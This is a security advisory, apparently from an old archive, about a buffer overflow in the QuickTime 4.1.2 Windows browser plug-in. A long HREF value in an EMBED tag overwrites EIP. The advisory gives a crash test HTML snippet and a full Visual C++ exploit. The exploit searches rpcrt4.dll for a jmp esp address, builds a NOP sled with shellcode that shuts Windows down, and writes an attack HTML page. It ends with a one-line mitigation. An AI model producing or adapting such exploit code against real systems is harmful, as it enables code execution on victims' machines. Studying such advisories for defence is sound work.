Vulnerability

    Quick Time

Affected

    QuickTime Player 4.1.2 for Windows (Japanese)

Description

    'UNYUN' (Shadow  Penguin Security)  found following.   There is  a
    exploitable buffer overflow bug in quick time plug-in for windows.
    This problem occurs when the visitor clicks the shown movie in the
    browser.   Quick time  plug-in doesn't  check the  length of  HREF
    parameter in  EMBED tag  appropriately, Quick  time overflows when
    the  long  string  is  specified  in  HREF.   This buffer overflow
    overwrites the local  buffer, the codes  which are written  in the
    EMBED tag can be executed in the client host.

    If the HTML file which contains the cracking code in EMBED tag  is
    opened and visitor clicks the shown movie, the cracking code  will
    be  executed  on  the  client  host.   This  overflow contains the
    possibility   of   the   virus   and   trojans  infection,  sytsem
    destruction, intrusion, and so on.

    We will explain the details of this problem under the  environment
    of Windows98 (SE/Japanes) +  QuickTime Player 4.1.2 for  Windows +
    Internet Explorer 5.0.  You  can check this problem easily  by the
    following simple HTML file.

        <html>
        <embed src="c:\program files\quicktime\sample.mov"
               href="aaaa... long string (730 characters)"
               width=60 height=60 autoplay="true"
               target="QUICKTIMEPLAYER">
        </html>

    * You  must  prepare  a  sample  movie  file  to specify in  "src"
      parameter.
    * Write 730 bytes characters in "href" parameter.

    Internet Explorer will crash by the buffer overflow when the shown
    movie on browser is clicked.  You will be able to see that EIP  is
    0x61616161 in GPF dialog box when Internet Explorer is crashed.

    Following sample  generates a  HTML file  which includes  the code
    which shutdowns Windows by using ExitWindowsEx API.  The  shutdown
    code is written  in EMBED tag,  and executed by  using this buffer
    overflow problem.   When you check  this problem by  the following
    sample code, you must set appropriate movie file in MOV_FILE  (the
    movie file "sample.  mov"  which is written in the  following code
    is a  sample which  is installed  when Quick  Time Player 4.1.2 is
    installed by default).  This sample code can be compiled by Visual
    C++ 6.0.   This sample code  was checked under  the environment of
    Windows98 Second Edition (Japanese) + Internet Explorer 5.0.

    /*====================================================================
       Apple QuickTime 4.1.2 plug-in exploit
       The Shadow Penguin Security (http://shadowpenguin.backsection.net)
       Written by UNYUN (shadowpenguin@backsection.net)
      ====================================================================
    */
    
    #include    <stdio.h>
    #include    <stdlib.h>
    #include    <windows.h>
    
    #define MOV_FILE    "c:\\program files\\quicktime\\sample.mov"
    #define HEIGHT      60
    #define WIDTH       60
    #define TARGET      "QUICKTIMEPLAYER"
    #define FILE_IMAGE  \
                        "<html><embed src=\"%s\" href=\"%s\" "\
                        "width=%d height=%d autoplay=\"true\" "\
                        "target=\"%s\"><br></html>"
    #define BUFSIZE     730
    #define RET         684
    #define ESP_TGT     "rpcrt4.dll"
    #define JMPESP_1    0xff
    #define JMPESP_2    0xe4
    #define NOP         0x90
    
    unsigned char   exploit_code[200]={
            0x33,0xC0,0x40,0x40,0x40,0x40,0x40,0x50,
            0x50,0x90,0xB8,0x2D,0x23,0xF5,0xBF,0x48,
            0xFF,0xD0,0x00,
    };
    
    main(int argc,char *argv[])
    {
        FILE            *fp;
        char            buf[BUFSIZE];
        unsigned int    i,pretadr,p,ip,kp;
        MEMORY_BASIC_INFORMATION meminfo;
    
        if (argc<2){
            printf("usage : %s Output_HTML-fileName [Sample .mov file]\n",
                   argv[0]);
            exit(1);
        }
    
        if ((void *)(kp=(unsigned int)LoadLibrary(ESP_TGT))==NULL){
             printf("%s is not found.\n",ESP_TGT);
             exit(1);
        }
    
        VirtualQuery((void *)kp,&meminfo,sizeof(MEMORY_BASIC_INFORMATION));
        pretadr=0;
        for (i=0;i<meminfo.RegionSize;i++){
            p=kp+i;
            if (  ( p     &0xff)==0
               || ((p>>8 )&0xff)==0
               || ((p>>16)&0xff)==0
               || ((p>>24)&0xff)==0) continue;
            if (   *((unsigned char *)p)==JMPESP_1
                && *(((unsigned char *)p)+1)==JMPESP_2)
                pretadr=p;
        }
        if ((fp=fopen(argv[1],"wb"))==NULL){
            printf("File write error \"%s\"\n",argv[1]);
            exit(1);
        }
        memset(buf,NOP,BUFSIZE);
        memcpy(buf+700-12,exploit_code,strlen(exploit_code));
        buf[BUFSIZE-2]=0;
    
        ip=pretadr;
        printf("EIP=%x\n",ip);
        buf[RET  ]=ip&0xff;
        buf[RET+1]=(ip>>8)&0xff;
        buf[RET+2]=(ip>>16)&0xff;
        buf[RET+3]=(ip>>24)&0xff;
    
        if (argc==2)
            fprintf(fp,FILE_IMAGE,MOV_FILE,buf,WIDTH,HEIGHT,TARGET);
        else
            fprintf(fp,FILE_IMAGE,argv[2],buf,WIDTH,HEIGHT,TARGET);
        fclose(fp);
        printf("Done.\n");
     }

Solution

    Disable the execution of ActiveX control and plug-in.